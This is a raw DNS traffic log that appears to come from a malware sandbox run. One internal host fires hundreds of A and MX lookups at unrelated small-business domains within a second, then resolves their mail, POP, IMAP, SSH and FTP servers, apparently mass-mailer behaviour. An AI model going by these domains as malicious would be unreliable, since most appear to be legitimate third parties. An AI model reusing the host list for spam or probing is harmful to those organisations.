Dec 22, 2023 21:14:49.781497955 CET	192.168.2.4	1.1.1.1	0x8287	Standard query (0)	liberty25.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.781759977 CET	192.168.2.4	1.1.1.1	0xfaeb	Standard query (0)	sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.781991005 CET	192.168.2.4	1.1.1.1	0x1467	Standard query (0)	mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.783123970 CET	192.168.2.4	1.1.1.1	0x973e	Standard query (0)	mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.783802986 CET	192.168.2.4	1.1.1.1	0xaea0	Standard query (0)	taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.783984900 CET	192.168.2.4	1.1.1.1	0xae15	Standard query (0)	bethanyhomesnc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.784334898 CET	192.168.2.4	1.1.1.1	0x8185	Standard query (0)	integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.784585953 CET	192.168.2.4	1.1.1.1	0x9e5f	Standard query (0)	51goabroad.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.900139093 CET	192.168.2.4	1.1.1.1	0x67c4	Standard query (0)	hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906775951 CET	192.168.2.4	1.1.1.1	0x7c30	Standard query (0)	enricobassi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906805038 CET	192.168.2.4	1.1.1.1	0xb1b9	Standard query (0)	dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906860113 CET	192.168.2.4	1.1.1.1	0x1adc	Standard query (0)	afrimail.33mail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906860113 CET	192.168.2.4	1.1.1.1	0x5e14	Standard query (0)	nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906860113 CET	192.168.2.4	1.1.1.1	0x453f	Standard query (0)	fotoestudiomiret.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906897068 CET	192.168.2.4	1.1.1.1	0x3ce6	Standard query (0)	vixej.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906897068 CET	192.168.2.4	1.1.1.1	0x991b	Standard query (0)	esisalama.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.906919956 CET	192.168.2.4	1.1.1.1	0x3caf	Standard query (0)	excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907088995 CET	192.168.2.4	1.1.1.1	0xfd28	Standard query (0)	pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907128096 CET	192.168.2.4	1.1.1.1	0x2d99	Standard query (0)	ispsolucoes.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907128096 CET	192.168.2.4	1.1.1.1	0xc62	Standard query (0)	oe.target.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907186985 CET	192.168.2.4	1.1.1.1	0x1ab8	Standard query (0)	enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907232046 CET	192.168.2.4	1.1.1.1	0xe5c3	Standard query (0)	distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907233000 CET	192.168.2.4	1.1.1.1	0xeb99	Standard query (0)	mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907270908 CET	192.168.2.4	1.1.1.1	0x285b	Standard query (0)	maroonshockey.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907272100 CET	192.168.2.4	1.1.1.1	0x4ea1	Standard query (0)	videolifeperu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907347918 CET	192.168.2.4	1.1.1.1	0xa30f	Standard query (0)	coupons2grab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907347918 CET	192.168.2.4	1.1.1.1	0x8807	Standard query (0)	daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907407045 CET	192.168.2.4	1.1.1.1	0x8c7a	Standard query (0)	dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907407045 CET	192.168.2.4	1.1.1.1	0x2033	Standard query (0)	indfos.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907716990 CET	192.168.2.4	1.1.1.1	0x5bdf	Standard query (0)	acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.907942057 CET	192.168.2.4	1.1.1.1	0x4f6d	Standard query (0)	harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.908910036 CET	192.168.2.4	1.1.1.1	0xb922	Standard query (0)	keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.912774086 CET	192.168.2.4	1.1.1.1	0x79f8	Standard query (0)	demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.913417101 CET	192.168.2.4	1.1.1.1	0x38f0	Standard query (0)	rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.914252996 CET	192.168.2.4	1.1.1.1	0x81e5	Standard query (0)	customizedperformance.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.915642023 CET	192.168.2.4	1.1.1.1	0x379e	Standard query (0)	aikya.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.915777922 CET	192.168.2.4	1.1.1.1	0x9995	Standard query (0)	racesystems.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.915867090 CET	192.168.2.4	1.1.1.1	0x2868	Standard query (0)	ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.915894985 CET	192.168.2.4	1.1.1.1	0x96d7	Standard query (0)	thenile.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.915926933 CET	192.168.2.4	1.1.1.1	0x7bba	Standard query (0)	bldowney.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.916129112 CET	192.168.2.4	1.1.1.1	0x39e7	Standard query (0)	valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.917576075 CET	192.168.2.4	1.1.1.1	0x477	Standard query (0)	caribbean360.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.917880058 CET	192.168.2.4	1.1.1.1	0xddb9	Standard query (0)	yandfcorp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.918071985 CET	192.168.2.4	1.1.1.1	0xa833	Standard query (0)	sunbeltfinancial.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.918217897 CET	192.168.2.4	1.1.1.1	0xcc36	Standard query (0)	earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.918520927 CET	192.168.2.4	1.1.1.1	0xa953	Standard query (0)	gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.918967962 CET	192.168.2.4	1.1.1.1	0xad50	Standard query (0)	necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.919258118 CET	192.168.2.4	1.1.1.1	0xeb7e	Standard query (0)	gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.919603109 CET	192.168.2.4	1.1.1.1	0xd531	Standard query (0)	tgeddesgrant.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.919861078 CET	192.168.2.4	1.1.1.1	0x6132	Standard query (0)	fuckyoufriday.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.920746088 CET	192.168.2.4	1.1.1.1	0xf4c4	Standard query (0)	oljud.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.921906948 CET	192.168.2.4	1.1.1.1	0xa00e	Standard query (0)	yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219369888 CET	192.168.2.4	1.1.1.1	0x1f2e	Standard query (0)	davescheirer.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219424009 CET	192.168.2.4	1.1.1.1	0xd0aa	Standard query (0)	williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219424009 CET	192.168.2.4	1.1.1.1	0x2e47	Standard query (0)	hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219497919 CET	192.168.2.4	1.1.1.1	0xaea0	Standard query (0)	taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219497919 CET	192.168.2.4	1.1.1.1	0xae15	Standard query (0)	bethanyhomesnc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219562054 CET	192.168.2.4	1.1.1.1	0x9e5f	Standard query (0)	51goabroad.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219625950 CET	192.168.2.4	1.1.1.1	0x1d15	Standard query (0)	dpikorea.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219702005 CET	192.168.2.4	1.1.1.1	0xfa0a	Standard query (0)	tvs-e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219733953 CET	192.168.2.4	1.1.1.1	0x8287	Standard query (0)	liberty25.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219733953 CET	192.168.2.4	1.1.1.1	0x26b2	Standard query (0)	pistik.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219769001 CET	192.168.2.4	1.1.1.1	0x973e	Standard query (0)	mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219816923 CET	192.168.2.4	1.1.1.1	0x26e1	Standard query (0)	pcfocus.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219887018 CET	192.168.2.4	1.1.1.1	0x123b	Standard query (0)	geis.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219887018 CET	192.168.2.4	1.1.1.1	0x814	Standard query (0)	kegerators.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219887018 CET	192.168.2.4	1.1.1.1	0x9a62	Standard query (0)	jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219964981 CET	192.168.2.4	1.1.1.1	0xb12c	Standard query (0)	pcfocus.com.hk	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.219964981 CET	192.168.2.4	1.1.1.1	0xf1e	Standard query (0)	omuramba.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220016003 CET	192.168.2.4	1.1.1.1	0x67c4	Standard query (0)	hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220016003 CET	192.168.2.4	1.1.1.1	0xaf25	Standard query (0)	51goabroad.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220016003 CET	192.168.2.4	1.1.1.1	0xaf12	Standard query (0)	distraction.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220077038 CET	192.168.2.4	1.1.1.1	0x79f8	Standard query (0)	demarillac.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220117092 CET	192.168.2.4	1.1.1.1	0x4f6d	Standard query (0)	harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220117092 CET	192.168.2.4	1.1.1.1	0x5bdf	Standard query (0)	acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220159054 CET	192.168.2.4	1.1.1.1	0xb922	Standard query (0)	keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220159054 CET	192.168.2.4	1.1.1.1	0xf4c4	Standard query (0)	oljud.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220160007 CET	192.168.2.4	1.1.1.1	0xad50	Standard query (0)	necalin.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220205069 CET	192.168.2.4	1.1.1.1	0x6132	Standard query (0)	fuckyoufriday.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220269918 CET	192.168.2.4	1.1.1.1	0xddb9	Standard query (0)	yandfcorp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220269918 CET	192.168.2.4	1.1.1.1	0x81e5	Standard query (0)	customizedperformance.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220331907 CET	192.168.2.4	1.1.1.1	0x39e7	Standard query (0)	valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220331907 CET	192.168.2.4	1.1.1.1	0x379e	Standard query (0)	aikya.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220331907 CET	192.168.2.4	1.1.1.1	0x38f0	Standard query (0)	rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220375061 CET	192.168.2.4	1.1.1.1	0xd531	Standard query (0)	tgeddesgrant.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220375061 CET	192.168.2.4	1.1.1.1	0x477	Standard query (0)	caribbean360.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220376015 CET	192.168.2.4	1.1.1.1	0xcc36	Standard query (0)	earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220468044 CET	192.168.2.4	1.1.1.1	0xeb7e	Standard query (0)	gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220468044 CET	192.168.2.4	1.1.1.1	0xa833	Standard query (0)	sunbeltfinancial.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220511913 CET	192.168.2.4	1.1.1.1	0xa953	Standard query (0)	gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.220554113 CET	192.168.2.4	1.1.1.1	0xa00e	Standard query (0)	yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.231261015 CET	192.168.2.4	1.1.1.1	0x1cc2	Standard query (0)	jaydien.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:50.234580994 CET	192.168.2.4	1.1.1.1	0x201b	Standard query (0)	bethanyhomesnc-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.234580994 CET	192.168.2.4	1.1.1.1	0x2334	Standard query (0)	loghole.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.234908104 CET	192.168.2.4	1.1.1.1	0xd8f	Standard query (0)	chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.235995054 CET	192.168.2.4	1.1.1.1	0xcbaf	Standard query (0)	vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.237184048 CET	192.168.2.4	1.1.1.1	0x31c	Standard query (0)	jaydien.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.237184048 CET	192.168.2.4	1.1.1.1	0xf950	Standard query (0)	mcammond.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.237896919 CET	192.168.2.4	1.1.1.1	0xc1a2	Standard query (0)	djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.237896919 CET	192.168.2.4	1.1.1.1	0x453f	Standard query (0)	bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.238173008 CET	192.168.2.4	1.1.1.1	0xba2b	Standard query (0)	covicol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.238420963 CET	192.168.2.4	1.1.1.1	0x605b	Standard query (0)	cannaclear.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.238735914 CET	192.168.2.4	1.1.1.1	0x81ef	Standard query (0)	cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239078045 CET	192.168.2.4	1.1.1.1	0x5b2c	Standard query (0)	customintegrated.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239078045 CET	192.168.2.4	1.1.1.1	0x792c	Standard query (0)	eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239078045 CET	192.168.2.4	1.1.1.1	0xa7ca	Standard query (0)	mailbox.lpl.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239408016 CET	192.168.2.4	1.1.1.1	0xa843	Standard query (0)	aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239561081 CET	192.168.2.4	1.1.1.1	0xaf0a	Standard query (0)	asdfhjlasdfhjlk1.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239739895 CET	192.168.2.4	1.1.1.1	0x4c4d	Standard query (0)	saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239859104 CET	192.168.2.4	1.1.1.1	0x88cc	Standard query (0)	studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.239859104 CET	192.168.2.4	1.1.1.1	0x4b88	Standard query (0)	intermountainmls.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.240179062 CET	192.168.2.4	1.1.1.1	0xbc05	Standard query (0)	select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.240288019 CET	192.168.2.4	1.1.1.1	0xd5	Standard query (0)	nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.240581989 CET	192.168.2.4	1.1.1.1	0xdbdc	Standard query (0)	firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.240581989 CET	192.168.2.4	1.1.1.1	0x305	Standard query (0)	oceanictrailers.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.240652084 CET	192.168.2.4	1.1.1.1	0x2b07	Standard query (0)	srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.240886927 CET	192.168.2.4	1.1.1.1	0xc777	Standard query (0)	rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.241019011 CET	192.168.2.4	1.1.1.1	0x8b4d	Standard query (0)	154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.242007017 CET	192.168.2.4	1.1.1.1	0x7c71	Standard query (0)	joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.242007017 CET	192.168.2.4	1.1.1.1	0x1338	Standard query (0)	dl-it.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.242253065 CET	192.168.2.4	1.1.1.1	0xd110	Standard query (0)	bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.242286921 CET	192.168.2.4	1.1.1.1	0x1cff	Standard query (0)	massnegocios.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.242513895 CET	192.168.2.4	1.1.1.1	0xc957	Standard query (0)	adm-works.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.242691040 CET	192.168.2.4	1.1.1.1	0xac41	Standard query (0)	theproducebox.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.243894100 CET	192.168.2.4	1.1.1.1	0x207c	Standard query (0)	smartiebritches.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.251264095 CET	192.168.2.4	1.1.1.1	0x4f31	Standard query (0)	conquestaccounting.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.251264095 CET	192.168.2.4	1.1.1.1	0xc0b4	Standard query (0)	saltdelcolom.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.345472097 CET	192.168.2.4	1.1.1.1	0x58b6	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.503258944 CET	192.168.2.4	1.1.1.1	0xe5d7	Standard query (0)	mx01.dondominio.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518058062 CET	192.168.2.4	1.1.1.1	0x2b07	Standard query (0)	srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518094063 CET	192.168.2.4	1.1.1.1	0x792c	Standard query (0)	eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518095016 CET	192.168.2.4	1.1.1.1	0xf950	Standard query (0)	mcammond.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518162012 CET	192.168.2.4	1.1.1.1	0x31c	Standard query (0)	jaydien.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518162012 CET	192.168.2.4	1.1.1.1	0xa7ca	Standard query (0)	mailbox.lpl.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518162012 CET	192.168.2.4	1.1.1.1	0xba2b	Standard query (0)	covicol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518204927 CET	192.168.2.4	1.1.1.1	0xc0b4	Standard query (0)	saltdelcolom.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518204927 CET	192.168.2.4	1.1.1.1	0x1338	Standard query (0)	dl-it.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518205881 CET	192.168.2.4	1.1.1.1	0x8b4d	Standard query (0)	154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518275976 CET	192.168.2.4	1.1.1.1	0xc957	Standard query (0)	adm-works.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518275976 CET	192.168.2.4	1.1.1.1	0x4f31	Standard query (0)	conquestaccounting.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518275976 CET	192.168.2.4	1.1.1.1	0x1cff	Standard query (0)	massnegocios.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518316984 CET	192.168.2.4	1.1.1.1	0x207c	Standard query (0)	smartiebritches.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.518316984 CET	192.168.2.4	1.1.1.1	0x58b6	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.519795895 CET	192.168.2.4	1.1.1.1	0x9594	Standard query (0)	ismaworld-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.525938034 CET	192.168.2.4	1.1.1.1	0xbae2	Standard query (0)	mailstore1.secureserver.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.525938034 CET	192.168.2.4	1.1.1.1	0xc6f0	Standard query (0)	aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.665641069 CET	192.168.2.4	1.1.1.1	0xe5d7	Standard query (0)	mx01.dondominio.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.665774107 CET	192.168.2.4	1.1.1.1	0x9594	Standard query (0)	ismaworld-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.671248913 CET	192.168.2.4	1.1.1.1	0x3f43	Standard query (0)	smartiebritches-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.730983019 CET	192.168.2.4	1.1.1.1	0x40b4	Standard query (0)	yandfcorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.732326984 CET	192.168.2.4	1.1.1.1	0xc8d6	Standard query (0)	mx1-us1.ppe-hosted.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.739257097 CET	192.168.2.4	1.1.1.1	0x10b4	Standard query (0)	d298861b.ess.barracudanetworks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.739753008 CET	192.168.2.4	1.1.1.1	0x929a	Standard query (0)	cgoc.in.tmes.trendmicro.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.745991945 CET	192.168.2.4	1.1.1.1	0xe99f	Standard query (0)	mail.easlab.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.745991945 CET	192.168.2.4	1.1.1.1	0x1c78	Standard query (0)	mail.yandfcorp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.745991945 CET	192.168.2.4	1.1.1.1	0x643d	Standard query (0)	mail.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.747251034 CET	192.168.2.4	1.1.1.1	0xf05d	Standard query (0)	viruswall.tvs-e.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.747888088 CET	192.168.2.4	1.1.1.1	0xc890	Standard query (0)	mail.customintegrated.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.747888088 CET	192.168.2.4	1.1.1.1	0x3df0	Standard query (0)	mailgate.customintegrated.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.748198986 CET	192.168.2.4	1.1.1.1	0x1e6a	Standard query (0)	mail.eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.750809908 CET	192.168.2.4	1.1.1.1	0x7712	Standard query (0)	pop.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.750809908 CET	192.168.2.4	1.1.1.1	0x3354	Standard query (0)	alt3.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.750809908 CET	192.168.2.4	1.1.1.1	0x97d3	Standard query (0)	ftp.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.763827085 CET	192.168.2.4	1.1.1.1	0xde21	Standard query (0)	mx-biz.mail.am0.yahoodns.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.764348030 CET	192.168.2.4	1.1.1.1	0x63bc	Standard query (0)	mx.core.locaweb.com.br	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.765281916 CET	192.168.2.4	1.1.1.1	0x578e	Standard query (0)	bldowney.com.1.0001.arsmtp.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.765609026 CET	192.168.2.4	1.1.1.1	0x3d68	Standard query (0)	smtp.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.766529083 CET	192.168.2.4	1.1.1.1	0xb6c4	Standard query (0)	davescheirer-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.766529083 CET	192.168.2.4	1.1.1.1	0x4779	Standard query (0)	ssh.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.767628908 CET	192.168.2.4	1.1.1.1	0x3117	Standard query (0)	mail.harrell-associates.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.768037081 CET	192.168.2.4	1.1.1.1	0xd2f5	Standard query (0)	ssh.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.768037081 CET	192.168.2.4	1.1.1.1	0x8c4e	Standard query (0)	mail.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.768037081 CET	192.168.2.4	1.1.1.1	0xe35d	Standard query (0)	mx.coxmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.768810987 CET	192.168.2.4	1.1.1.1	0x3a57	Standard query (0)	d298861a.ess.barracudanetworks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.772195101 CET	192.168.2.4	1.1.1.1	0xcc57	Standard query (0)	pop3.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.773169994 CET	192.168.2.4	1.1.1.1	0x78c4	Standard query (0)	mailgate.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.774105072 CET	192.168.2.4	1.1.1.1	0x4e74	Standard query (0)	mx.enricobassi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.775253057 CET	192.168.2.4	1.1.1.1	0x138a	Standard query (0)	imap.eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.775253057 CET	192.168.2.4	1.1.1.1	0x9902	Standard query (0)	mx.avasin.plus.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.828854084 CET	192.168.2.4	1.1.1.1	0x4f8c	Standard query (0)	pop.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.828854084 CET	192.168.2.4	1.1.1.1	0xa5ce	Standard query (0)	imap.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.828854084 CET	192.168.2.4	1.1.1.1	0x3f43	Standard query (0)	smartiebritches-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.831253052 CET	192.168.2.4	1.1.1.1	0x743	Standard query (0)	alt1.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:50.831626892 CET	192.168.2.4	1.1.1.1	0x4e92	Standard query (0)	mail.freedhal.com	A (IP address)	IN (0x0001)	false
